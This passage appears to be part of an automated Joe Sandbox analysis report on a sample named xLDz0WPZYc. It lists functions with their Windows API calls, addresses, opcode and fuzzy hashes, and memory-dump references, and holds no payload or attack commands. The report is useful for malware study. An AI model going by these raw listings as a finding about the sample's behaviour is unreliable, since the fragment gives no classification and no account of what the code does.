Opcode Fuzzy Hash: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
Instruction Fuzzy Hash: 9E51A4BA908214DFFB14DF60DCC5B5937A8EB443D4F218429EA08E725DDF38A981CB94

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
Instruction ID: debc39b6c0c0c652093bc86d0143b21aa6e0fee53ad258223395c8adf4e96fc0
Opcode Fuzzy Hash: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
Instruction Fuzzy Hash: 69012831724210ABE7294B789D04B6A3698FB10315F11853BF851F72F1D6B8DC029B5D

Function 004019F1 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: 237656e7a5223b0fc568df716d08b201413e5858611488689f9afad6102e13d6
Instruction ID: 1cebdbbb507966aa4e04b965186861386515d9572d1459ddf9e42193a25d50de
Opcode Fuzzy Hash: 237656e7a5223b0fc568df716d08b201413e5858611488689f9afad6102e13d6
Instruction Fuzzy Hash: FBF0A772F05201EBCB21DF699D44A9B7FE4EF51350B10803BE545F6190D2788541DF59

Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,?), ref: 00401DC2
EnableWindow.USER32(00000000,00000000), ref: 00401DCD

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: d72798fdfe0d8bcbd0a18b635dccf75de9a373b64156bf13e72c37387aef51bb
Instruction ID: 2292e0465f89c440c037b44611e353697929a97950b3395032e547bd7800e083
Opcode Fuzzy Hash: d72798fdfe0d8bcbd0a18b635dccf75de9a373b64156bf13e72c37387aef51bb
Instruction Fuzzy Hash: 22E0CD72B04110EBDB10BBB45E4A55E3374DF10359B104437F501F11C1D2B85C40865D

Function 00405829 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405441,?,?,00000000,00405624,?,?,?,?), ref: 0040582E
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405842

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction ID: 288d8d8f9d8fe744cb80d7443cee80a3ea5bd4e337ee5555e0f2e4cd48392136
Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction Fuzzy Hash: 2AD0C972908120ABC2102728AD0889BBB55EB542717018B31FC65A22B0C7304C62CAA5

Function 00402519 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 52d227b069a4f50f4663a99c055d473dfe313c221a454c9b799207d0049fc586
Instruction ID: 38726b43949b5a2518c2c56a8bcba1ba1be011e092181c2ab2ffeedb07cfb521
Opcode Fuzzy Hash: 52d227b069a4f50f4663a99c055d473dfe313c221a454c9b799207d0049fc586
Instruction Fuzzy Hash: EA212B70D05295BECF229F684E681EEBFB09B05304F64407BE490B63C5E1BC9A81CB2D

Function 0040223B Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9

Function 004025D3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED

Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 264239d96475cbcc5d4300545bda0f6e18d175a5ecefe532acf18532d7180738
Instruction ID: bd4189dad9187afc7bd613b68c6e414ef86462d36aacf7d26f302923069a669c
Opcode Fuzzy Hash: 264239d96475cbcc5d4300545bda0f6e18d175a5ecefe532acf18532d7180738
Instruction Fuzzy Hash: 32E04FB6A01120BBDB01BBA55E4ADBF7778EB60309B14853BF501F00C1C3BC59019A2E

Function 004058C6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,00403068,00000000,00000000,00402EAE,000000FF,?,00000000,00000000,00000000), ref: 004058DA

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 18ab15d3875c8aca8147d786b71a19f163cd1be083ac94134eb356fb97c53e98
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 9FE0EC3361425AEFDF10AE659C04AEB7B6CEF05360F008433FD15E2150D231E921EBA9

Function 1000270F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000404C,?,?,1000403C), ref: 1000272D

Memory Dump Source

Source File: 00000000.00000002.1880481343.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1880446902.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880503056.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880544481.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_xLDz0WPZYc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 4dab7c069dd6fc30f8915db09394f7f991a1b088a201bba37056324bf7fcc065
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: 98F09BF19092A0DEF360DF688CC47063FE4E3993D5B03852AE358F6269EB7441448B19

Function 0040227F Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c1a4a3283c9bf9659f66a17b5c1bdba59a903c5432fcec64ba6c0d2a491762e4
Instruction ID: 9169326a2aec8439feca5866952fa18bd92df46eb8b4a67c681bb8a0ef40d438
Opcode Fuzzy Hash: c1a4a3283c9bf9659f66a17b5c1bdba59a903c5432fcec64ba6c0d2a491762e4
Instruction Fuzzy Hash: CDD01277B08114E7DB00EBB9AE48A9E73A4FB50325F208637D111F11D0D3B98551EA29

Function 00403EBF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010444,00000000,00000000,00000000), ref: 00403ED1

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
Instruction ID: b3c8485646d9c058ec71e9ab696a48b88cadb806b99eba66945500c977f65eb2
Opcode Fuzzy Hash: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
Instruction Fuzzy Hash: 1EC04C717442007AEA218F509D49F1777586750701F5544257254A51D0C6B4E410D66D

Function 0040306B Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF0,?), ref: 00403079

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 00403EA8 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,00403CD9), ref: 00403EB6

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
Instruction ID: 72d9328d989bd28a4b04e8d0bfc49dcb98a3c5c69b67aa4312834a6063493829
Opcode Fuzzy Hash: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
Instruction Fuzzy Hash: 54B01235685200BBEE324F00DD0DF497E72F764B02F008034B300240F0C6B300A5DB19

Function 00403E95 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403C72), ref: 00403E9F

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9d98744450fa71a660f12360689da69116cf16b41945ad655af5f03ec15b630f
Instruction ID: 924e4898ca7b55125a55dbaf25208a334d7a0dcb277bd93e9961852eecaff849
Opcode Fuzzy Hash: 9d98744450fa71a660f12360689da69116cf16b41945ad655af5f03ec15b630f
Instruction Fuzzy Hash: 9BA00176808205ABCB029B60EF09D8ABF62BBA4705B028435E65594174DA325865FF9A

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E5

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2505bb96396968dd077fca102448b2724b96d68f41baa3939dbbddaef1709036
Instruction ID: 8f5234f8cee202cc8b7374a2ab75ea98a04b7977738942e6e00dbb9fbc80be57
Opcode Fuzzy Hash: 2505bb96396968dd077fca102448b2724b96d68f41baa3939dbbddaef1709036
Instruction Fuzzy Hash: AED0C7B7B141006BD750E7B86E8545A73E8F75135A7148833D502E1191D17DC9418519

Non-executed Functions

Function 00404823 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 0040483B
GetDlgItem.USER32(?,00000408), ref: 00404846
GlobalAlloc.KERNEL32(?,?), ref: 00404890
LoadBitmapA.USER32(0000006E), ref: 004048A3
SetWindowLongA.USER32(?,?,00404E1A), ref: 004048BC
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 004048D0
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048E2
SendMessageA.USER32(?,00001109,00000002), ref: 004048F8
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404904
SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404916
DeleteObject.GDI32(00000000), ref: 00404919
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404944
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404950
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E5
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A10
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A24
GetWindowLongA.USER32(?,?), ref: 00404A53
SetWindowLongA.USER32(?,?,00000000), ref: 00404A61
ShowWindow.USER32(?,00000005), ref: 00404A72
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B6F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BD4
SendMessageA.USER32(?,?,00000000,00000000), ref: 00404BE9
SendMessageA.USER32(?,00000420,00000000,?), ref: 00404C0D
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C2D
ImageList_Destroy.COMCTL32(00000000), ref: 00404C42
GlobalFree.KERNEL32(00000000), ref: 00404C52
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CCB
SendMessageA.USER32(?,00001102,?,?), ref: 00404D74
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D83
InvalidateRect.USER32(?,00000000,?), ref: 00404DA3
ShowWindow.USER32(?,00000000), ref: 00404DF1
GetDlgItem.USER32(?,000003FE), ref: 00404DFC
ShowWindow.USER32(00000000), ref: 00404E03

Strings

, xrefs: 00404DDB
M, xrefs: 004049CC
N, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 530fea0a5efbac08350800dd6edac4f541af9ecf28185b85d10bd058308ad18e
Instruction ID: e15dc7f2636af8312206252945434afb9f5109210b4da1b7208a5bfe9f4b469d
Opcode Fuzzy Hash: 530fea0a5efbac08350800dd6edac4f541af9ecf28185b85d10bd058308ad18e
